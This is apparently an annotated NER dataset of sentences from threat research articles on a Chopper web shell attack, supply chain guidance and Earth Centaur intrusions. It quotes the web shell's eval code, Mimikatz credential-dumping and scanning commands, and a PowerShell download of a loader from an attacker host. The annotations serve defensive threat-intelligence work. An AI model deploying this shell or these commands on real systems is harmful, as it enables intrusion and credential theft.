will dissect a targeted attack that made use of the Chopper ASPX web shell (detected by Trend Micro as Backdoor.ASP.WEBSHELL.UWMANA). Technical Analysis","entities":[{"id":49758,"label":"malware","start_offset":197,"end_offset":219},{"id":49759,"label":"malware","start_offset":248,"end_offset":276},{"id":49760,"label":"identity","start_offset":233,"end_offset":244}],"relations":[],"Comments":[]} {"id":3910,"text":"Initial access","entities":[],"relations":[],"Comments":[]} {"id":3911,"text":"Based on our investigation, the Chopper web shell is dropped via a system token, potentially via a Microsoft Exchange Server vulnerability.","entities":[{"id":49762,"label":"vulnerability","start_offset":99,"end_offset":138},{"id":49763,"label":"malware","start_offset":32,"end_offset":49}],"relations":[{"id":865,"from_id":49763,"to_id":49762,"type":"exploits"}],"Comments":[]} {"id":3912,"text":"One notable vulnerability in the Microsoft Exchange Server is CVE-2020-0688, a remote code execution bug.","entities":[{"id":49764,"label":"SOFTWARE","start_offset":33,"end_offset":58},{"id":49765,"label":"vulnerability","start_offset":62,"end_offset":75},{"id":49766,"label":"attack-pattern","start_offset":79,"end_offset":100}],"relations":[{"id":866,"from_id":49764,"to_id":49765,"type":"has"},{"id":867,"from_id":49765,"to_id":49766,"type":"uses"}],"Comments":[]} {"id":3913,"text":"Microsoft issued a patch for this vulnerability in February 2020.","entities":[{"id":49768,"label":"TIME","start_offset":52,"end_offset":65},{"id":49767,"label":"identity","start_offset":0,"end_offset":9}],"relations":[],"Comments":[]} {"id":3914,"text":"However, the malicious actors behind this attack drop the Chopper web shell in the web directory folder to establish persistence.","entities":[{"id":49769,"label":"malware","start_offset":58,"end_offset":75}],"relations":[],"Comments":[]} {"id":3915,"text":"Through the ASPX file, malicious actors can establish a foothold in affected public-facing Outlook Web App (OWA) servers and send remote commands through them.","entities":[{"id":49770,"label":"SOFTWARE","start_offset":91,"end_offset":112}],"relations":[],"Comments":[]} {"id":3916,"text":"Outlook Web App (Web Directory) - D:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\15.1.2044\\scripts\\premium\\premium.aspx","entities":[{"id":49771,"label":"SOFTWARE","start_offset":0,"end_offset":15},{"id":49772,"label":"FILEPATH","start_offset":36,"end_offset":149}],"relations":[],"Comments":[]} {"id":3917,"text":"The attack features the following script:","entities":[],"relations":[],"Comments":[]} {"id":3918,"text":"<%@ Page Language=\"Jscript\" Debug=true%>","entities":[],"relations":[],"Comments":[]} {"id":3919,"text":"var","entities":[],"relations":[],"Comments":[]} {"id":3920,"text":"System.Text.Encoding.GetEncoding(65001).GetString(System.Convert.FromBase64String(\"UmVxdWVzdC5Gb3JtWyJjb21tYW5kIl0=\"))","entities":[],"relations":[],"Comments":[]} {"id":3921,"text":"var b=System.Text.Encoding.GetEncoding(65001).GetString(System.Convert.FromBase64String(\"dW5zYWZl\")); var c=eval(a,b); eval(c,b); %>","entities":[],"relations":[],"Comments":[]} {"id":3922,"text":"When simplified, the malicious script looks like this, with the eval being the executor and the Request.Form acquiring the parameter to be executed:","entities":[],"relations":[],"Comments":[]} {"id":3923,"text":"<%@ Page Language=\"Jscript\"%><%eval(Request.Form[\"Command\"],\"unsafe\");%> We’ve observed that in some cases, malicious actors insert this short script to avoid detection: Figure 1. A short script","entities":[],"relations":[],"Comments":[]} {"id":3924,"text":"inserted by malicious actors to avoid detection ","entities":[],"relations":[],"Comments":[]} {"id":3925,"text":"User Activity Checking Once Chopper successfully infects a system, the malicious actor will issue a query user (quser) command in an attempt to identify the primary user or those who are currently logged in as users in the system.","entities":[{"id":49773,"label":"malware","start_offset":28,"end_offset":35}],"relations":[],"Comments":[]} {"id":3926,"text":"Based on our observation, the quser command was used routinely throughout the attack to determine active remote sessions.","entities":[],"relations":[],"Comments":[]} {"id":3927,"text":" Figure 2.","entities":[],"relations":[],"Comments":[]} {"id":3928,"text":"The quser command is used to identify active remote sessions.","entities":[],"relations":[],"Comments":[]} {"id":3929,"text":" Deobfuscation technique","entities":[],"relations":[],"Comments":[]} {"id":3930,"text":"To deploy its tools, it uses the expand command to extract package files dropped in the system.","entities":[],"relations":[],"Comments":[]} {"id":3931,"text":"expand {filename}.ex_ {filename}.dat expand {filename}.ex_ {filename}.exe","entities":[],"relations":[],"Comments":[]} {"id":3932,"text":"We saw a noticeable difference with this attack compared to other Chopper attacks — its use of the .dat file extension, which is commonly used for data storage purposes, such as in a user profile’s ntuser.dat.","entities":[{"id":49774,"label":"malware","start_offset":66,"end_offset":73}],"relations":[],"Comments":[]} {"id":3933,"text":"In this particular Chopper attack, the .dat files are used as executables.","entities":[{"id":49775,"label":"malware","start_offset":19,"end_offset":26}],"relations":[],"Comments":[]} {"id":3934,"text":"Lateral movement","entities":[{"id":49776,"label":"attack-pattern","start_offset":0,"end_offset":16}],"relations":[],"Comments":[]} {"id":3935,"text":"It proceeded with copying the Chopper web shell into accessible shared folders in other hosts to gain access.","entities":[{"id":49777,"label":"malware","start_offset":30,"end_offset":47}],"relations":[],"Comments":[]} {"id":3936,"text":"copy premium.aspx \"\\\\{hostname}\\d$\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\15.1.2044\\scripts\\premium","entities":[{"id":49778,"label":"FILEPATH","start_offset":19,"end_offset":132},{"id":49779,"label":"FILEPATH","start_offset":5,"end_offset":17}],"relations":[],"Comments":[]} {"id":3937,"text":"It also scans for vulnerabilities across the network by using an installed tool, Hacktool.Win32.CATLIKE.A, and a legitimate cURL, C:\\temp\\curl.dat.","entities":[{"id":49780,"label":"malware","start_offset":81,"end_offset":105},{"id":49781,"label":"FILEPATH","start_offset":130,"end_offset":146}],"relations":[],"Comments":[]} {"id":3938,"text":" It specifically scans for web server-related vulnerabilities and password weaknesses in Apache Tomcat, Citrix, and phpMyAdmin applications.","entities":[{"id":49783,"label":"SOFTWARE","start_offset":104,"end_offset":110},{"id":49784,"label":"SOFTWARE","start_offset":116,"end_offset":126},{"id":49782,"label":"SOFTWARE","start_offset":89,"end_offset":102}],"relations":[],"Comments":[]} {"id":3939,"text":"Application\/Port Command Oracle WebLogic curl.dat -v -H 'Content-Type: text\/","entities":[{"id":49785,"label":"SOFTWARE","start_offset":27,"end_offset":42},{"id":49786,"label":"FILEPATH","start_offset":44,"end_offset":52}],"relations":[],"Comments":[]} {"id":3940,"text":"xml;charset","entities":[],"relations":[],"Comments":[]} {"id":3941,"text":"UTF-8","entities":[],"relations":[],"Comments":[]} {"id":3942,"text":"http:\/\/{ip address\\]:7001\/wls-wsat\/CoordinatorPortType Oracle Console curl.dat -vv http:\/\/{ip address}:7001\/console\/j_security_check -d j_username={username}&j_password={password}&submit=Login\"","entities":[{"id":49789,"label":"FILEPATH","start_offset":72,"end_offset":81},{"id":49787,"label":"URL","start_offset":0,"end_offset":54},{"id":49788,"label":"URL","start_offset":85,"end_offset":134}],"relations":[],"Comments":[]} {"id":3943,"text":" PHPMyAdmin curl.dat -vv --connect-timeout 2 {ip address}\/phpmyadmin Apache Tomcat s.dat -u http:\/\/{ip address}:8080\/manager\/html Ports 7001 9095 5556 8080 s.dat -i 10.217.229.189 -p {ports} Table 1.","entities":[{"id":49790,"label":"SOFTWARE","start_offset":71,"end_offset":84},{"id":49791,"label":"FILEPATH","start_offset":86,"end_offset":91},{"id":49792,"label":"FILEPATH","start_offset":95,"end_offset":132},{"id":49793,"label":"IPV4","start_offset":173,"end_offset":187}],"relations":[],"Comments":[]} {"id":3944,"text":"Commands used to scan for web server-related vulnerabilities and passwords on certain applications and ports","entities":[],"relations":[],"Comments":[]} {"id":3945,"text":"We saw that this attack also uses the WMI command line (wmic) utility to perform remote process execution on other infected endpoints.","entities":[],"relations":[],"Comments":[]} {"id":3946,"text":" Execution of arbitrary commands via session id","entities":[],"relations":[],"Comments":[]} {"id":3947,"text":"Successful exploitation of CVE-2020-0688 gives Chopper access to system privileges.","entities":[{"id":49794,"label":"vulnerability","start_offset":27,"end_offset":40},{"id":49795,"label":"malware","start_offset":47,"end_offset":54}],"relations":[],"Comments":[]} {"id":3948,"text":"In one of the endpoints, it will drop and execute Trojan.Win32.PRIVESC.A.","entities":[{"id":49796,"label":"malware","start_offset":50,"end_offset":72}],"relations":[],"Comments":[]} {"id":3949,"text":"This trojan requires to be run under a user with SeTcbPrivilege.","entities":[],"relations":[],"Comments":[]} {"id":3950,"text":"It allows an attacker to see all Windows sessions and can execute arbitrary commands on the session via session id.","entities":[],"relations":[],"Comments":[]} {"id":3951,"text":" Figure 3. Examples of arbitrary commands being performed on the session via session id Discovery","entities":[],"relations":[],"Comments":[]} {"id":3952,"text":"For its discovery, it uses typical Windows command-line tools such as nltest, ping, whoami, netstat, net, nslookup, hostname, and tasklist, which are commonly used in other attacks.","entities":[{"id":49799,"label":"tools","start_offset":84,"end_offset":90},{"id":49797,"label":"tools","start_offset":70,"end_offset":76},{"id":49798,"label":"tools","start_offset":78,"end_offset":82},{"id":49804,"label":"tools","start_offset":131,"end_offset":139},{"id":49801,"label":"tools","start_offset":102,"end_offset":105},{"id":49802,"label":"tools","start_offset":107,"end_offset":115},{"id":49800,"label":"tools","start_offset":93,"end_offset":100},{"id":49803,"label":"tools","start_offset":117,"end_offset":125}],"relations":[],"Comments":[]} {"id":3953,"text":"In addition, a publicly available JoeWare domain tool called LG.exe, which is quite popular among attackers and domain admins alike, was installed and used in the attack.","entities":[{"id":49805,"label":"FILEPATH","start_offset":61,"end_offset":67},{"id":49806,"label":"tools","start_offset":34,"end_offset":53}],"relations":[],"Comments":[]} {"id":3954,"text":"Credential access","entities":[],"relations":[],"Comments":[]} {"id":3955,"text":"For obtaining user credentials, the attackers used HackTool.MSIL.Mimikatz.AF, a modified version of the open-sourced application Mimikatz, using the following parameters: x, xxx, xxxx, xxxasd. wmic \/node:{ip address} process call create \"cmd.exe \/c c:\\users\\mpBD6D42.dat xxxasd -pass > c:\\users\\23.txt Collection","entities":[{"id":11981,"label":"FILEPATH","start_offset":238,"end_offset":245},{"id":49807,"label":"malware","start_offset":51,"end_offset":76},{"id":49808,"label":"tools","start_offset":129,"end_offset":137},{"id":49809,"label":"FILEPATH","start_offset":249,"end_offset":270},{"id":49810,"label":"FILEPATH","start_offset":286,"end_offset":301}],"relations":[],"Comments":[]} {"id":3956,"text":"The attackers use wevtutil.exe to query security-related events from a target username and export it as a q.txt file.","entities":[{"id":49811,"label":"FILEPATH","start_offset":18,"end_offset":30},{"id":49812,"label":"FILEPATH","start_offset":106,"end_offset":111}],"relations":[],"Comments":[]} {"id":3957,"text":"For packaging stolen credentials and other logs, it uses the makecab command instead of a third-party application such as rar.exe.","entities":[{"id":49814,"label":"FILEPATH","start_offset":122,"end_offset":129},{"id":49813,"label":"attack-pattern","start_offset":14,"end_offset":32}],"relations":[],"Comments":[]} {"id":3958,"text":"· makecab a.txt > 111 · makecab aaa2.txt >1","entities":[{"id":49816,"label":"FILEPATH","start_offset":46,"end_offset":54},{"id":49815,"label":"FILEPATH","start_offset":17,"end_offset":22}],"relations":[],"Comments":[]} {"id":3959,"text":"The attacker uses installed security components or applications as filenames to hide in plain sight.","entities":[],"relations":[],"Comments":[]} {"id":3960,"text":"· C:\\Program Files\\Trend Micro\\ ams p.dat · C:\\Oracle\\Oracle.dat · C:\\Program Files\\McAfee\\MacAfee.dat These suspicious activities were seen via our XDR solution, which helped us monitor observable attack techniques and provided critical security alerts including anomalous file extension execution, remote execution via system tools, web shell-related activities, and potential exploit attacks.","entities":[{"id":49817,"label":"FILEPATH","start_offset":9,"end_offset":48},{"id":49818,"label":"FILEPATH","start_offset":58,"end_offset":78},{"id":49819,"label":"FILEPATH","start_offset":88,"end_offset":124}],"relations":[],"Comments":[]} {"id":3961,"text":" Security recommendations","entities":[],"relations":[],"Comments":[]} {"id":3962,"text":"Web shells can be embedded in systems via security gaps such as vulnerabilities.","entities":[{"id":49820,"label":"attack-pattern","start_offset":0,"end_offset":10}],"relations":[],"Comments":[]} {"id":3963,"text":"Attackers will work to identify vulnerable applications used in systems to exploit them and install web shells for remote code execution or data exfiltration.","entities":[{"id":49821,"label":"attack-pattern","start_offset":115,"end_offset":136},{"id":49822,"label":"attack-pattern","start_offset":92,"end_offset":110},{"id":49823,"label":"attack-pattern","start_offset":140,"end_offset":157}],"relations":[],"Comments":[]} {"id":3964,"text":"We provide some security recommendations to ensure that enterprises and organizations can defend against web shell attacks: ","entities":[{"id":49824,"label":"attack-pattern","start_offset":105,"end_offset":122}],"relations":[],"Comments":[]} {"id":3965,"text":"Patch your systems and applications.","entities":[],"relations":[],"Comments":[]} {"id":3966,"text":"Ensure proper vulnerability patches are applied for public-facing applications, such as Apache Tomcat, Oracle Web Logic Server, Microsoft Exchange Server, and PHPMyAdmin.","entities":[{"id":49827,"label":"SOFTWARE","start_offset":128,"end_offset":153},{"id":49826,"label":"SOFTWARE","start_offset":103,"end_offset":126},{"id":49825,"label":"SOFTWARE","start_offset":88,"end_offset":101},{"id":49828,"label":"SOFTWARE","start_offset":159,"end_offset":169}],"relations":[],"Comments":[]} {"id":3967,"text":"Implement strong passwords.","entities":[],"relations":[],"Comments":[]} {"id":3968,"text":"Do not use the same password for multiple applications or websites.","entities":[],"relations":[],"Comments":[]} {"id":3969,"text":"Use multi-factor authentication whenever possible and regularly update it.","entities":[],"relations":[],"Comments":[]} {"id":3970,"text":"Check for static keys in the IIS web.config file.","entities":[{"id":49829,"label":"FILEPATH","start_offset":33,"end_offset":43}],"relations":[],"Comments":[]} {"id":3971,"text":" As observed on CVE-2020-0688, the use of static keys — as opposed to randomly generated keys — can allow an attacker to execute arbitrary code by tricking the server into deserializing ViewState data.","entities":[{"id":49830,"label":"vulnerability","start_offset":16,"end_offset":29},{"id":49831,"label":"attack-pattern","start_offset":121,"end_offset":143}],"relations":[{"id":868,"from_id":49830,"to_id":49831,"type":"uses"}],"Comments":[]} {"id":3972,"text":" Enterprises and organizations should have comprehensive and efficient protection, detection, prevention, and remediation based on real-time, higher-confidence alerts to protect critical data and operations from sophisticated attacks and threats.","entities":[],"relations":[],"Comments":[]} {"id":3973,"text":"A consolidated view of all security sensors provides a single-pane-of-glass view that will promote quick and thorough investigation and response.","entities":[],"relations":[],"Comments":[]} {"id":3974,"text":" Trend Micro Solutions Trend Micro’s comprehensive XDR solution applies the most effective expert analytics to the deep data sets collected from Trend Micro solutions across the enterprise — including email, endpoints, servers, cloud workloads, and networks — making faster connections to identify and stop attacks.","entities":[{"id":49834,"label":"identity","start_offset":25,"end_offset":36},{"id":49835,"label":"identity","start_offset":147,"end_offset":158},{"id":49833,"label":"SOFTWARE","start_offset":3,"end_offset":24}],"relations":[],"Comments":[]} {"id":3975,"text":"Powerful artificial intelligence (AI) and expert security analytics correlate data from customer environments and Trend Micro’s global threat intelligence to deliver fewer, higher-fidelity alerts, leading to better, early detection.","entities":[{"id":49836,"label":"identity","start_offset":114,"end_offset":125}],"relations":[],"Comments":[]} {"id":3976,"text":"One console with one source of prioritized, optimized alerts supported with guided investigation simplifies the steps needed to fully understand the attack path and impact on the organization.","entities":[],"relations":[],"Comments":[]} {"id":3977,"text":"Indicators of compromise Filename Path SHA-256 Detection Notes ss.exe C:\\temp\\ ee63b49aca1495a170ea7273316385b606f3fd2df1e48e9f4de0f241d98bd055 HackTool.Win32.CATLIKE.A Vulnerability Scanner LG.exe C:\\temp\\ C:\\hp\\ 5099264b16208d88c9bca960751f5e3de7a5420986fa0d7e2b2a6b16af3909e9 HackTool.Win32.JoeWare.A. JoeWare Local Group Manipulation tool LG.dat C:\\hp\\ 5099264b16208d88c9bca960751f5e3de7a5420986fa0d7e2b2a6b16af3909e9 HackTool.Win32.JoeWare.A. JoeWare Local Group Manipulation tool mpBD6D42.dat C:\\Users C:\\Perflogs C:\\hp C:\\temp e9be71848d1faa0c41db4c6a1e901747d98fb0b3cca027f8be85ea5e339b75e3 HackTool.MSIL.Mimikatz.AF Mimikatz Tags Endpoints | APT & Targeted Attacks | Research | Network | Articles, News, Reports","entities":[{"id":12061,"label":"SHA2","start_offset":227,"end_offset":291},{"id":12063,"label":"SHA2","start_offset":375,"end_offset":439},{"id":12060,"label":"SHA2","start_offset":87,"end_offset":151},{"id":12066,"label":"tools","start_offset":650,"end_offset":658},{"id":12065,"label":"SHA2","start_offset":557,"end_offset":621},{"id":49840,"label":"FILEPATH","start_offset":202,"end_offset":208},{"id":49845,"label":"malware","start_offset":623,"end_offset":648},{"id":49847,"label":"FILEPATH","start_offset":367,"end_offset":373},{"id":49848,"label":"FILEPATH","start_offset":507,"end_offset":519},{"id":49849,"label":"FILEPATH","start_offset":521,"end_offset":541},{"id":49850,"label":"FILEPATH","start_offset":542,"end_offset":555},{"id":49837,"label":"FILEPATH","start_offset":69,"end_offset":75},{"id":49842,"label":"FILEPATH","start_offset":219,"end_offset":225},{"id":49838,"label":"FILEPATH","start_offset":77,"end_offset":85},{"id":49839,"label":"malware","start_offset":153,"end_offset":177},{"id":49841,"label":"FILEPATH","start_offset":210,"end_offset":218},{"id":49843,"label":"malware","start_offset":293,"end_offset":317},{"id":49844,"label":"malware","start_offset":441,"end_offset":465},{"id":49846,"label":"FILEPATH","start_offset":359,"end_offset":365}],"relations":[{"id":869,"from_id":12060,"to_id":49839,"type":"indicates"},{"id":870,"from_id":49838,"to_id":49839,"type":"indicates"},{"id":871,"from_id":49837,"to_id":49839,"type":"indicates"},{"id":872,"from_id":12061,"to_id":49843,"type":"indicates"},{"id":873,"from_id":49842,"to_id":49843,"type":"indicates"},{"id":874,"from_id":49841,"to_id":49843,"type":"indicates"},{"id":875,"from_id":49840,"to_id":49843,"type":"indicates"},{"id":876,"from_id":49846,"to_id":49844,"type":"indicates"},{"id":877,"from_id":49847,"to_id":49844,"type":"indicates"},{"id":878,"from_id":12063,"to_id":49844,"type":"indicates"},{"id":879,"from_id":49848,"to_id":49845,"type":"indicates"},{"id":880,"from_id":49849,"to_id":49845,"type":"indicates"},{"id":881,"from_id":49850,"to_id":49845,"type":"indicates"},{"id":882,"from_id":12065,"to_id":49845,"type":"indicates"}],"Comments":[]} {"id":3978,"text":"The Cybersecurity and Infrastructure Security Agency (CISA) and the National Institute for Standards and Technology (NIST) recently published “Defending Against Software Supply Chain Attacks”.","entities":[{"id":49852,"label":"identity","start_offset":68,"end_offset":122},{"id":49851,"label":"identity","start_offset":4,"end_offset":59}],"relations":[],"Comments":[]} {"id":3979,"text":"The guideline provides an overview of software supply chain risk and how vendors and customers can identify and assess such risks using the NIST Cyber Supply Chain Risk Management (C-SCRM) Framework and the Secure Software Development Framework (SSDF).","entities":[],"relations":[],"Comments":[]} {"id":3980,"text":"Software supply chains are an integral part of a large information and communications technology (ICT) supply chain framework.","entities":[],"relations":[],"Comments":[]} {"id":3981,"text":"It is an ecosystem of retailers, distributors, and suppliers participating in the sale, delivery, and production of hardware, software, and managed services.","entities":[],"relations":[],"Comments":[]} {"id":3982,"text":"An attack on the software supply chain happens when a cyber threat actor invades a vendor's network and uses malicious codes, compromising the software before the vendor sends it to their consumers.","entities":[],"relations":[],"Comments":[]} {"id":3983,"text":"The compromised software will then put the customer's data or system at risk.","entities":[],"relations":[],"Comments":[]} {"id":3984,"text":"According to the guideline, newly acquired software may be compromised from the get-go.","entities":[],"relations":[],"Comments":[]} {"id":3985,"text":"It can also be compromised through a patch or hotfix.","entities":[],"relations":[],"Comments":[]} {"id":3986,"text":"These threats affect all users of the tampered software, resulting in major consequences for government, critical infrastructure, and private sector software consumers.","entities":[],"relations":[],"Comments":[]} {"id":3987,"text":"The guideline thoroughly explains the three most common methods threat groups use to infiltrate the supply chain.","entities":[],"relations":[],"Comments":[]} {"id":3988,"text":"It also establishes a few recommendations for software customers and vendors to prevent and mitigate attacks as well as improve resilience against software supply chain attacks.","entities":[],"relations":[],"Comments":[]} {"id":3989,"text":"The three most common methods are taking over the software update mechanism to deliver an updated software with malicious code, exploiting misconfigured access controls, and targeting publicly accessible code libraries, and inserting malicious code, which unknowing customers then download to their systems.","entities":[],"relations":[],"Comments":[]} {"id":3990,"text":"The document also provides the following eight best practices for establishing a C-SCRM approach and applying it to software: Incorporating C-SCRM across the organization; Creating a formal C-SCRM program; Knowing and managing critical components and suppliers; Understanding the organization's supply chain; Working closely with key suppliers; Including key suppliers in resilience and improvement activities; Evaluating and monitoring throughout the supplier relationship; and Planning for the full life cycle.","entities":[],"relations":[],"Comments":[]} {"id":3991,"text":" While the guideline gives thorough recommendations on preventing supply chain attacks, it is still vital for organizations to take extra measures to mitigate vulnerable software components.","entities":[],"relations":[],"Comments":[]} {"id":3992,"text":"Organizations should also create a program that can manage and control their supply chain's vulnerabilities, minimizing the possibilities of attacks.","entities":[],"relations":[],"Comments":[]} {"id":3993,"text":"In addition, organizations must know and understand the risks associated with supply chains and smart factories.","entities":[],"relations":[],"Comments":[]} {"id":3994,"text":"To learn more about overlooked risks associated with supply chain and smart factories, read our expert team's proof of concept paper, \"Forward-looking security analysis of smart factories\".","entities":[],"relations":[],"Comments":[]} {"id":3995,"text":"This extensive research also discusses feasible attack scenarios and recommended defense strategies.","entities":[],"relations":[],"Comments":[]} {"id":3996,"text":" Tags Latest News | Cloud | APT & Targeted Attacks | Network | Articles, News, Reports | Cyber Threats","entities":[],"relations":[],"Comments":[]} {"id":3997,"text":"The Cybersecurity and Infrastructure Security Agency (CISA) recently issued an alert regarding an advanced persistent threat (APT) compromising government agencies, critical infrastructures, and private sector organizations.","entities":[{"id":49853,"label":"identity","start_offset":4,"end_offset":59}],"relations":[],"Comments":[]} {"id":3998,"text":"According to CISA, the APT actor is accountable for the compromise of the SolarWinds Orion supply chain.","entities":[{"id":49854,"label":"identity","start_offset":13,"end_offset":17},{"id":49855,"label":"SOFTWARE","start_offset":74,"end_offset":91}],"relations":[],"Comments":[]} {"id":3999,"text":"The actor is also responsible for the abuse of commonly used authentication mechanisms.","entities":[{"id":49856,"label":"attack-pattern","start_offset":38,"end_offset":86}],"relations":[],"Comments":[]} {"id":4000,"text":"The Agency then urged organizations to make identifying and addressing such threats a priority.","entities":[],"relations":[],"Comments":[]} {"id":4001,"text":"Under the Presidential Policy Directive (PPD) 41, the agency, together with the Federal Bureau of Investigation (FBI), and the Office of the Director of National Intelligence (ODNI), formed a Cyber Unified Coordination Group (UCG).","entities":[{"id":49859,"label":"identity","start_offset":192,"end_offset":230},{"id":49857,"label":"identity","start_offset":80,"end_offset":117},{"id":49858,"label":"identity","start_offset":127,"end_offset":181}],"relations":[],"Comments":[]} {"id":4002,"text":"This group aims to coordinate a \"whole-of-government\" response to the above-mentioned cyber incident.?","entities":[],"relations":[],"Comments":[]} {"id":4003,"text":"A UCG is also formed for integrating private sector partners into incident response efforts.","entities":[{"id":49860,"label":"identity","start_offset":2,"end_offset":5}],"relations":[],"Comments":[]} {"id":4004,"text":"In general, a Cyber UCG is created when a vital cyber incident affects critical infrastructure owners and operators.","entities":[{"id":49861,"label":"identity","start_offset":14,"end_offset":23}],"relations":[],"Comments":[]} {"id":4005,"text":"These are determined by the Secretary of Homeland Security as possessing or operating critical infrastructure wherein a cyber incident could lead to a catastrophic regional or national effect on national security, economic security, or public health.","entities":[{"id":49862,"label":"identity","start_offset":28,"end_offset":58}],"relations":[],"Comments":[]} {"id":4006,"text":"Supply chain attacks are quite risky and could result in real-world impacts.","entities":[],"relations":[],"Comments":[]} {"id":4007,"text":"In a report done by Trend Micro entitled “Critical Infrastructures Exposed and at Risk: Energy and Water Industries”, researchers were able to expose vulnerabilities of human-machine interface (HMI) used in critical water and energy organizations.","entities":[{"id":49863,"label":"identity","start_offset":20,"end_offset":31}],"relations":[],"Comments":[]} {"id":4008,"text":"They also showed real-world implications that these vulnerabilities have.","entities":[],"relations":[],"Comments":[]} {"id":4009,"text":"Geopolitical risk is also a big concern for securing supply chains.","entities":[],"relations":[],"Comments":[]} {"id":4010,"text":"To mitigate such risk, organizations must think globally and exert efforts to follow codes of local culture.","entities":[],"relations":[],"Comments":[]} {"id":4011,"text":"Organizations need to have a deeper understanding of regional and national policies to ensure the safety of the supply chain.","entities":[],"relations":[],"Comments":[]} {"id":4012,"text":"Read our three-part series on smart factories from the perspective of supply chain disruptions to learn more about supply chain cybersecurity.","entities":[],"relations":[],"Comments":[]} {"id":4013,"text":" Tags Latest News | ICS OT | APT & Targeted Attacks | IoT |","entities":[],"relations":[],"Comments":[]} {"id":4014,"text":"Articles, News, Reports","entities":[],"relations":[],"Comments":[]} {"id":4015,"text":"Earth Centaur, previously known as Tropic Trooper, is a long-running cyberespionage threat group that has been active since 2011.","entities":[{"id":49866,"label":"TIME","start_offset":118,"end_offset":128},{"id":49865,"label":"threat-actor","start_offset":35,"end_offset":49},{"id":49864,"label":"threat-actor","start_offset":0,"end_offset":13}],"relations":[{"id":883,"from_id":49864,"to_id":49865,"type":"duplicate-of"}],"Comments":[]} {"id":4016,"text":"In July 2020, we noticed interesting activity coming from the group, and we have been closely monitoring it since.","entities":[{"id":49867,"label":"TIME","start_offset":3,"end_offset":12}],"relations":[],"Comments":[]} {"id":4017,"text":"The actors seem to be targeting organizations in the transportation industry and government agencies related to transport.","entities":[],"relations":[],"Comments":[]} {"id":4018,"text":" We observed that the group tried to access some internal documents (such as flight schedules and documents for financial plans) and personal information on the compromised hosts (such as search histories).","entities":[],"relations":[],"Comments":[]} {"id":4019,"text":" Currently, we have not discovered substantial damage to these victims as caused by the threat group.","entities":[],"relations":[],"Comments":[]} {"id":4020,"text":"However, we believe that it will continue collecting internal information from the compromised victims and that it is simply waiting for an opportunity to use this data.","entities":[],"relations":[],"Comments":[]} {"id":4021,"text":"Through long-term monitoring, we learned that this threat group is proficient at red teamwork.","entities":[],"relations":[],"Comments":[]} {"id":4022,"text":"The group knows how to bypass security settings and keep its operation unobstructive.","entities":[],"relations":[],"Comments":[]} {"id":4023,"text":"Depending on the target, it uses backdoors with different protocols, and it can also use the reverse proxy to bypass the monitoring of network security systems.","entities":[],"relations":[],"Comments":[]} {"id":4024,"text":"The usage of the open-source frameworks also allows the group to develop new backdoor variants efficiently.","entities":[],"relations":[],"Comments":[]} {"id":4025,"text":"We expand on these techniques and other capabilities in the following sections.","entities":[],"relations":[],"Comments":[]} {"id":4026,"text":" More importantly, we believe the activities we observed are just the tip of the iceberg and their targets might be expanded to other industries that are related to transportation.","entities":[],"relations":[],"Comments":[]} {"id":4027,"text":"It is our aim, through this article, to encourage enterprises to review their own security setting and protect themselves from damage and compromise.","entities":[],"relations":[],"Comments":[]} {"id":4028,"text":" Overview of Earth Centaur’s infection chain","entities":[{"id":49868,"label":"threat-actor","start_offset":14,"end_offset":27}],"relations":[],"Comments":[]} {"id":4029,"text":"Based on our investigation, we found that the intrusion process used by Earth Centaur can be separated into several stages, which are shown in Figure 1.","entities":[{"id":49869,"label":"threat-actor","start_offset":72,"end_offset":85}],"relations":[],"Comments":[]} {"id":4030,"text":" We found that the threat actors used vulnerable Internet Information Services (IIS) server and Exchange server vulnerabilities as entry points, and then installed web shells.","entities":[{"id":49871,"label":"vulnerability","start_offset":96,"end_offset":127},{"id":49872,"label":"vulnerability","start_offset":38,"end_offset":91},{"id":49873,"label":"attack-pattern","start_offset":164,"end_offset":174}],"relations":[{"id":884,"from_id":49872,"to_id":49873,"type":"uses"},{"id":885,"from_id":49871,"to_id":49873,"type":"uses"}],"Comments":[]} {"id":4031,"text":"Afterward, the .NET loader (detected as Nerapack) and the first stage backdoor (Quasar remote administration tool aka Quasar RAT) were deployed on the compromised machine.","entities":[{"id":49875,"label":"malware","start_offset":80,"end_offset":113},{"id":49874,"label":"malware","start_offset":40,"end_offset":48},{"id":49876,"label":"malware","start_offset":118,"end_offset":128}],"relations":[{"id":887,"from_id":49875,"to_id":49876,"type":"duplicate-of"},{"id":888,"from_id":49874,"to_id":49876,"type":"delivers"}],"Comments":[]} {"id":4032,"text":"Then, depending on the victims, the threat actors dropped different types of second-stage backdoors, such as ChiserClient and SmileSvr.","entities":[{"id":49877,"label":"malware","start_offset":109,"end_offset":121},{"id":49878,"label":"malware","start_offset":126,"end_offset":134}],"relations":[],"Comments":[]} {"id":4033,"text":"After exploiting the victim's environments successfully, the threat actors start Active Directory (AD) discovery and spread their tools via Server Message Block (SMB).","entities":[],"relations":[],"Comments":[]} {"id":4034,"text":"Then, they use intranet penetration tools to build the connection between the victim’s intranet and their command-and-control (C&C) servers.","entities":[],"relations":[],"Comments":[]} {"id":4035,"text":"We go into further detail about these stages in our analysis.","entities":[],"relations":[],"Comments":[]} {"id":4036,"text":" Figure 1. Stages of Earth Centaur’s intrusion process Technical Analysis of Earth Centaur’s Tools and Techniques Stage 1: Loaders","entities":[{"id":49880,"label":"threat-actor","start_offset":87,"end_offset":100},{"id":49879,"label":"threat-actor","start_offset":26,"end_offset":39}],"relations":[],"Comments":[]} {"id":4037,"text":"After the threat actors get access to the vulnerable hosts by using ProxyLogon exploits and web shells, they use bitsadmin to download the next-stage loader (loaders are detected as Nerapack) as well as its payload file (.bin). C:\\Windows\\system32\\windowspowershell\\v1.0\\powershell.exe -Command \"&{Import-Module BitsTransfer; Start-BitsTransfer 'http:\/\/:8000\/dfmanager.exe' \"%temp%\/dfmanager.exe\"}\" C:\\Windows\\system32\\windowspowershell\\v1.0\\powershell.exe -Command \"&{Import-Module BitsTransfer; Start-BitsTransfer 'http:\/\/:8000\/dfmanager.bin' 